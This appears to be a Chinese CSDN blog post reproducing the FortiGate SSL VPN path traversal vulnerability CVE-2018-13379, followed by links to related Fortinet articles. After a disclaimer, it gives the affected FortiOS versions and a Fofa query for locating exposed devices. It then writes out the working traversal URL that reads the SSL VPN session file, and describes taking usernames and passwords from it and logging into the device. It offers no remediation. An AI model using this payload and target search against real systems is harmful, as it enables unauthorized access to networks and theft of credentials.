Fortigate SSL VPN路径遍历漏洞(CVE-2018-13379)

最新推荐文章于 2024-03-28 11:14:33 发布
最新推荐文章于 2024-03-28 11:14:33 发布
阅读量686 收藏
点赞数
分类专栏: 漏洞复现 文章标签: ssl 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44304678/article/details/134247749
版权

Fortigate SSL VPN路径遍历漏洞(CVE-2018-13379)

免责声明

仅用于技术交流,目的是向相关安全人员展示漏洞利用方式,以便更好地提高网络安全意识和技术水平。
任何人不得利用该文章进行非法攻击和侵犯他人的隐私和财产权利。一旦发生任何违法行为,责任自负。
该文章仅用于授权测试,任何未经授权的测试均属于非法行为。请在法律许可范围内使用。
作者对使用该文章导致的任何直接或间接损失不承担任何责任。使用此文章的风险由使用者自行承担。

漏洞描述

漏洞源于该系统未能正确地过滤资源或文件路径中的特殊元素,导致攻击者可以利用该漏洞访问受限目录以外的位置。

漏洞影响

Fortinet FortiOS 5.6.3版本至5.6.7版本、6.0.0版本至6.0.4版本中的SSL VPN 受此漏洞影响。

漏洞危害

获取敏感信息,造成数据泄露,并且可获取账户密码直通内网

网络测绘

Fofa: body=“FortiToken clock drift detected”

漏洞复现

1. 访问链接查看是否存在漏洞

/remote/fgt_lang?lang=/../../../..//dev/cmdb/sslvpn_websession

2. 查看用户名密码

在这里插入图片描述

3. 登录后台

在这里插入图片描述

小胡yhu
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
FortiGate VM64 v7.0.5 for Microsoft Hyper-V
04-27
FortiGate VM64 Hyper-V版本,New deployment of FortiGate for Microsoft Hyper-V FGT_VM64_HV-v7.0.5-build0304-FORTINET.out.hyperv.zip (69.54 MB)
fortigate-cookbook-504-expanded.pdf
09-05
The FortiGate Cookbook 5.0.4 (Expanded Version) Essential Recipes for Success with your FortiGate September 25, 2013 Copyright© 2013 Fortinet, Inc. All rights reserved. Fortinet®, FortiGate®, and FortiGuard®, are registered trademarks of Fortinet, Inc., and other Fortinet names herein may also be trademarks of Fortinet. All other product or company names may be trademarks of their respective owners. Performance metrics contained herein were attained in internal lab tests under ideal conditions, and performance may vary. Network variables, different network environments and other conditions may affect performance results. Nothing herein represents any binding commitment by Fortinet, and Fortinet disclaims all warranties, whether express or implied, except to the extent Fortinet enters a binding written contract, signed by Fortinet’s General Counsel, with a purchaser that expressly warrants that the identified product will perform according to the performance metrics herein. For absolute clarity, any such warranty will be limited to performance in the same ideal conditions as in Fortinet’s internal lab tests. Fortinet disclaims in full any guarantees. Fortinet reserves the right to change, modify, transfer, or otherwise revise this publication without notice, and the most current version of the publication shall be applicable.
教程篇(7.4) 10. SSL VPN & FortiGate管理员 ❀ Fortinet网络安全专家 NSE4
最新发布
防火墙技术专栏
03-28 190
在本课中,你将学习如何配置和使用SSL VPNSSL VPN是让远程用户访问你的私人网络的简单方法。
fortigate,5.4.12-FGT_100D-v5-build1225-FORTINET
09-22
名称:5.4.12-FGT_100D-v5-build1225-FORTINET 类型:.out
FortiGate-Infrastructure-6.4-Study-Guide-CN文档手册.pdf
10-18
FortiGate_Infrastructure_6.4_Study_Guide-CN文档手册.pdf
ssl漏洞复现
里查叔叔
01-03 473
GET请求改地址,可查看用户名 密码说明存在漏洞
网络靶场实战--飞塔(Fortinet)防火墙认证绕过漏洞(CVE-2022-40684)
蛇矛实验室
12-13 3741
我们这一小节简单了解了身份认证绕过流程,分析并复现了fortigate防火墙身份认证绕过漏洞的形成过程以及如何利用。蛇矛实验室成立于2020年,致力于安全研究、攻防解决方案、靶场对标场景仿真复现及技战法设计与输出等相关方向。团队核心成员均由从事安全行业10余年经验的安全专家组成,团队目前成员涉及红蓝对抗、渗透测试、逆向破解、病毒分析、工控安全以及免杀等相关领域。
安全漏洞通告」Fortinet SSL VPN远程代码执行漏洞解决方案
bocco的博客
12-14 1533
安全狗应急响应中心监测到,Fortinet发布了FortiOS SSL-VPN的风险通告,漏洞等级:高危,漏洞评分:9.3。漏洞编号:CVE-2022-42475。
教程篇(7.0) 12. FortiGate安全 & SSL安全隧道 ❀ Fortinet 网络安全专家 NSE 4
防火墙技术专栏
02-18 6627
在本节课中,你将学习如何配置和使用SSL VPNSSL VPN是一种让远程用户访问你的私有网络的简单方法。
Fortinet 修复 Fortigate SSL-VPN 设备中严重的 RCE 漏洞
smellycat000的专栏
06-12 939
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士Fortinet 发布新的 Fortigate 固件更新,修复了一个位于 SSL VPN设备中未披露的严重的预认证远程代码执行漏洞。该修复方案在上周五 FortiOS 固件版本6.0.17、6.2.15、6.4.13、7.0.12和7.2.5中发布。虽然发布公告中并未提及,但安全专业人员和管理人员提到,这些更新悄悄地修复了一个将在6月13日披露的...
fortigate 110c FGT-110C-v5-build0766-FORTINET
01-02
FGT_110C-v5-build0766-FORTINET 110C 的最后一个固件
Fortinet FortiOS 路径遍历漏洞(CVE-2018-13379
mei_13的博客
07-08 4027
1 漏洞简介 早在2019年5月24日,飞塔官方就发布了CVE-2018-13379漏洞安全公告,但直到8月份才有漏洞Exp流出,导致漏洞蔓延。 据官方介绍,CVE-2018-13379SSL VPN中的一个目录遍历漏洞,该漏洞源于网络系统或产品未能正确地过滤资源或文件路径中的特殊元素,导致攻击者可利用该漏洞访问受限目录之外的文件。 受影响的版本: FortiOS/5.6.3 ~ 5.6.7、FortiOS/6.0.0 ~ 6.0.4 2 环境搭建 使用FOFA中搜索飞塔SSL VPN服务器,
防火墙漏洞
不光要学,知识要能说出口
04-26 3980
2016年至今,网络设备的安全问题一直是一个相当热门的话题,特别是8月影子经纪人的黑客入侵方程式组织获取到的攻击工具,网络设备的安全就像黑夜中的曙光,慢慢吸引我们的注意。接下来我们就来了解下近年来热门的网络设备漏洞:Fortigate 2016 年 1 月 12 日,国外安全研究员esizkur爆料 FortiGate 防火墙存在一个后门,攻击者可以通过这个后门直接获取防火墙控制权限。影响范围:F
教程篇(7.0) 11. FortiGate安全 & 入侵防御和拒绝服务 ❀ Fortinet 网络安全专家 NSE 4
防火墙技术专栏
02-16 2083
在本课中,你将学习如何使用FortiGate来保护你的网络免受入侵和拒绝服务(DoS)攻击。
教程篇(5.0) 05. 通信控制 ❀ FortiEDR ❀ Fortinet 网络安全专家 NSE 5
防火墙技术专栏
06-16 510
在本课中,你将学习如何使用通信控制。
CVE-2018-13379 环境搭建+漏洞复现
yxngu
07-29 6352
正入万山圈子里,一山放过一山拦。
Fortinet FortiOS路径遍历漏洞 CVE-2018-13379
limb0的博客
11-09 6174
Fortinet FortiOS路径遍历漏洞 CVE-2018-13379 一、漏洞介绍 Fortinet FortiOS是美国飞塔(Fortinet)公司的一套专用于FortiGate网络安全平台上的安全操作系统。该系统为用户提供防火墙、防病毒、VPN、Web内容过滤和反垃圾邮件等多种安全功能。在2019年blackhat上,安全研究人员公布了Fortinet FortiOS多个漏洞,包括For...
CVE-2022-40684 Fortinet(飞塔)身份验证绕过漏洞
江左盟的博客
10-31 4464
FortiSwitchManager产品的管理界面中,可以通过使用备用路径或通道绕过身份验证,并在未经认证的情况下通过特制的HTTP或HTTPS请求对管理界面进行操作。
fortios5.6.7
07-28
根据引用\[2\],FortiOS 5.6.7是受到Fortinet FortiOS路径遍历漏洞(CNNVD-201905-1026、CVE-2018-13379)影响的版本。该漏洞源于系统未能正确地过滤资源或文件路径中的特殊元素,导致攻击者可以利用该漏洞访问受限...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值